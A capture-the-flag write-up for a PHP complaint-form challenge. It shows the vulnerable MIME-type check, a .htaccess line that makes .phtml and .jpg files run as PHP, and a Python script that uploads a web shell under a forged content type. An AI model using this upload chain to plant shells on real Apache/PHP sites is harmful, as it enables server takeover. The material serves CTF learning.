legal-complaint-form
SRC: https://library.m0unt41n.ch/challenges/legal-complaint-formOkay first of all, i consider myself a PHP pro, but damn i h8 apache... my main stack is using nginx as webserver...
This chall requires two main steps.
1. First of all there is a malicious fileupload vuln.. there is an unsecure MIME-Type validation due it it only checking for the Content-Type which can be forged by a custom request... the actual file can still be PHP for example..
PHP:
if (!in_array($_FILES['file']['type'], ['image/jpeg', 'image/gif', 'image/png', 'application/pdf'])) {
header('Location: /?error='.urlencode("Invalid file!"));
exit();
}2. So we can now just upload a shell and obtain the flag... BUUUT NO! There is an .htaccess preventing .php file from being accessed and .phtml or .PHP or .pHp etc. is not properly executed as php. So we have to do another lil trickery... we just upload another .htaccess LOL
PHP:
AddHandler application/x-httpd-php .phtml .jpgWe basically just add .phtml as an actual php handler lulz.
Our final payload looks smt like this:
Python:
import os
import requests
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
file_path = os.path.join(BASE_DIR, 'shell.php')
files = {
'file': (
'shell.phtml',
open(file_path, 'rb'),
'application/pdf'
)
}
data = {
'email': '[email protected]',
'description': 'shell upload'
}
url = 'https://x.library.m0unt41n.ch:31337/submit.php'
resp = requests.post(url, files=files, data=data)
print(f"Status: {resp.status_code}")
print(resp.text)
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
with open(os.path.join(BASE_DIR, '.htaccess'), 'rb') as f:
files = {'file': ('.htaccess', f, 'application/pdf')}
data = {'email':'[email protected]','description':'htaccess upload'}
r = requests.post(
'https://x.library.m0unt41n.ch:31337/submit.php',
files=files, data=data
)
print("htaccess upload:", r.status_code)And after successful upload of the .htaccess and shell we can visit the "case" file. with /case.php?id=IDHERE and then press on the file... /uploads/shell.phtml
